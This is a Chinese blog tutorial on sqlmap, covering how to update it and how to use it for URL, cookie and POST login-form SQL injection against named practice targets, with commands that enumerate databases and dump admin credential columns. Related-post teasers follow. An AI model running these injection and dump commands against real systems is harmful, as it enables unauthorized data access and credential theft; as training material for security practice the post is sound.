sql map专题

最新推荐文章于 2024-09-12 08:16:50 发布
最新推荐文章于 2024-09-12 08:16:50 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: sql 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cmcaimao/article/details/120784318
版权
本文介绍了SQLMap的更新步骤,包括通过删除并重新克隆仓库来更新。同时,详细阐述了SQLMap的三种使用场景:URL注入、COOKIE注入和POST登录框注入,展示了如何获取数据库名、表、列及字段等信息。此外,还提供了应对POST登录框注入的多种方法。
摘要由CSDN通过智能技术生成

1.sqlmap更新 

更新命令为:sqlmap -update

直接执行,如果出错。

解决方法: 找到sqlmap的路径/usr/share/salmap

执行 cd /usr/share/

然后删掉sqlmap   rm -rf sqlmap/

然后执行 git clone https://github.com/sqlmapproject/sqlmap   //克隆文件

sqlmap 参考资源 :sqlmap使用教程(超详细) - Angel-史迪仔 - 博客园
2.sqlmap使用方法

0x00 sqlmap简介

Sqlmap的7种等级:
常用–leve 3
在这里插入图片描述


0x01 mysql数据库的注入

靶场地址:http://59.63.200.79:8003
查看数据库名

sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs

在这里插入图片描述
查看表

sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables

在这里插入图片描述
查看列

sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe -T admin --columns

在这里插入图片描述

查看字段

sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe -T admin -C "Id,username,password" --dump

在这里插入图片描述


0x02 COOKIE注入

靶场地址:http://117.167.136.245:10181/
查看表

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=170" --table --level 2

在这里插入图片描述
查看列

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=170" -T admin --columns --level 2

在这里插入图片描述
查看字段

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=170" -T admin -C "user,content,flag,id,password,title,username" --level 2 --dump

在这里插入图片描述


0x03 POST登录框注入

靶场地址:
http://testasp.vulnweb.com/Login.asp
方法一:
1.点击login表单的submit按钮时用burp抓包
2.将拦截到的post请求存为txt, 放至sqlmap目录下
3.运行sqlmap并使用如下命令
sqlmap -r “search-test.txt” -p tfUPass
-r :让sqlmap加载我们的post请求rsearch-test.txt
-p :指定注入用的参数
查数据库

sqlmap -r "search-test.txt" -p tfUPass --dbs

查表

sqlmap -r "search-test.txt" -p tfUPass-D fendo --tables

查字段

sqlmap -r "search-test.txt" -p tfUPass-D fendo -T user --columns

方法二:
自动搜索

sqlmap -u "http://testasp.vulnweb.com/Login.asp" --forms

注意:
以下两个问题输入N其他均为Y。
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n]
对于剩余的测试,您想要包括所有针对“MySQL”扩展提供的级别(1)和风险(1)值的测试吗?[Y/n]
输入"N"
POST parameter ‘n’ is vulnerable. Do you want to keep testing the others (if any)? [y/N]
POST参数’n’是脆弱的。 你想继续测试其他人(如果有的话)吗?[y/N]
输入"N"

方法三:
指定参数搜索

sqlmap -u "http://testasp.vulnweb.com/Login.asp" --data "tfUName=321&tfUPass=321"

总结:
当post的body形式为:
param1=value1&param2=value2…使用方法一

bdcm
关注
专栏目录
sqlmapSQLi-LABS靶场 1-10关
小明师傅博客
06-04 8321
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
HQL(Hive SQL) 之查询语句专题汇总
xiaohu21的博客
09-06 2166
HQL(Hive SQL) 之查询语句专题汇总 1. 背景 hive本身是一个将sql语句转换为mapreduce 程序运行的转换器 hive可以把结构化数据转换到一张表上,并提供查询和分析的功能 针对这个过程,hive从sql优化、从mapreduce优化这2个大的角度来提升hive的性能表现。 sql优化,这个基于现有的第三方组件是比较成熟的技术解决方案。但优化mapreduce则需要更多精力。因为mapreduce代码是根据模板,将sql经过这个模板,转换为mapreduce程序。 hive本身是一
sqlmap的使用方法(含靶场)
0nc3的博客
11-06 7775
0x00 sqlmap简介 Sqlmap的7种等级: 常用–leve 3 0x01 mysql数据库的注入 靶场地址:http://59.63.200.79:8003 查看数据库名 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs 查看表 sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe...
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了_sqlmap使用教程
最新发布
2401_86436851的博客
09-12 434
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
Sqlmap中文手册
热门推荐
若水斋
12-22 12万+
这是我自己翻译的Sqlmap1.1.10的中文手册。Sqlmap是十分著名的、自动化的SQL注入工具。为了较为系统地学习Sqlmap,我决定翻译一遍Sqlmap的用户手册,于是便有了此文。由于我英语学得很差,所以翻译地不好。基本上是意译,还加入了我自己的东西,和原文有较大差距。
sql map
airujingye的专栏
12-11 689
sql map
SQL数组常用函数记录(Map篇)
weixin_40809627的博客
07-29 1157
MAP又被称为字典,格式如{key1:value1,key2:value2,…}形式,一般以k:v成对出现。1、map构造输出实例2、获取map 获取map字段的所有key值,或者所有value值map_keys(map字段) -- 返回map字段里所有的key值,输出为数组--> 输出示例:["14","28","180","365","7","90","60","30"]map_values(map字段) -- 返回map字段里左右的value值,输出为数组。
mapobject组件
05-13
### MapObject组件详解 #### 一、MapObjects概述 **MapObjects** 是一套先进的制图软件集合,专门针对软件开发者而设计,旨在帮助他们轻松地将地图功能集成到自己的应用程序中。这一工具集不仅提供了丰富的功能,...
使用MapObject组件开发GIS应用
4. **专题图绘制**:MapObject支持绘制专题图,通过数值、类别、密度、图表、事件或Z值等方法对图层进行特殊渲染,以直观展现数据的分布和变化。 5. **数据导入与投影**:它可以读取多种GIS数据格式,并支持数据...
SuperMap iclient for javascript标签专题图过滤显示
12-13
本篇将深入探讨如何利用该库实现基于属性SQL条件的标签专题图过滤显示。 **1. SuperMap iClient for JavaScript简介** SuperMap iClient for JavaScript是SuperMap公司推出的一款JavaScript API,用于构建基于Web的...
Java创建map集合
imtokenmax众筹
07-28 729
01 阿里面试题之MySQL 之前的阿里面试题都有做总结,具体面试题内容整理成了文档,本文是针对MySQL系列的,所以下面只展示了自己第一次面试阿里时被吊打问到的一些MySQL难题 请解释关系型数据库概念及主要特点? 请说出关系型数据库的典型产品、特点及应用场景? 请详细描述 SQL 语句分类及对应代表性关键字。 什么是 MySQL 多实例,如何配置 MySQL 多实例? 如何加强 MySQL 安全,请给出可行的具体措施? 误操作执行了一个 drop 库 SQL 语句,如何完整恢复? 详述 MySQL
SQLMap
m0_74326063的博客
08-04 85
配置完以后重启系统,查看是否生效,“win+R”,输入cmd,然后输入python,显示版本信息配置成功。把python27(就是刚才安装默认生成的文件夹)的路径加进去,点击确定后离开。直接将下载的SQLMap安装包解压到“C:/Python27”目录下。下载地址:http://sqlmap.org/点击环境变量——选择系统变量path——新建。按“win+R"键,输入sysdm.cpl。SQLMap 进阶:参数讲解。SQL Map 详解。显示正常,设置完成。
SQL map的基本用法
qq_44720671的博客
04-08 1万+
SQL map的基本用法(初步入门) sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。 首先,我们需要检测注入点是否可用 我以墨者学院的靶场为例: 这里的公告就是一个合适的注入点 (检测注入点需要利用其他工具) 我们可以利用手工注入的方式,但有些费时,因此我们可以使用SQL map等工具来...
web安全之通过sqlmap工具进行靶场练习
记录学习,一起进步
12-07 1148
web安全之通过sqlmap工具对靶场进行练习
SQLmap使用方法,sqli-labs靶场
ZhangAweio的博客
04-10 558
SQL-map是一个非常强大的注入的工具,自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入,支持mysqlsql-service 等简单使用nmap进行查询数据。
打靶场教学使用sqlmap
逍遥小哥的博客
02-02 546
sqlmap -r 1.txt --batch --current-db (--current-db就是判断网站是什么数据库的,--batch是自动化执行交互,不需要用户交互了)sqlmap -r ss.txt --batch --is-dba 判断当前用户是不是管理员权限。sqlmap -r ss.txt --batch --privileges 获取数据库用户的权限。sqlmap -r ss.txt --batch --current-user 获取当前用户。
【史上最全sqlmap通关sqli-labs靶场教程】
DMXA的博客
10-15 4264
【史上最全sqlmap通关sqli-labs靶场教程】
SQLMap入门(基于SQLMap1.4.9.3与《Web安全攻防渗透测试实战指南》提供的靶场)
coderge's CSDN Blog.
09-06 453
1 判断是否存在注入 假设目标注入点是http://localhost/sqli-labs/Less-1/?id=11,判断其是否存在注入点的命令如下所示: python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=11 sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests: --- Parameter: id (GE..
最全sqlmap命令
gzy1616的博客
03-06 595
-search 搜索数据库名、表明、列名,需要与-D -T或-C 联用。--columns 在-D -T情况下输出表中所有列名。-C column 在-D -T情况下输出某列数据的值。--tables 在-D情况下输出库中所有表名。--file-dest 上传文件(指定目标机器路径)--file-write 上传文件(指定本地路径)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值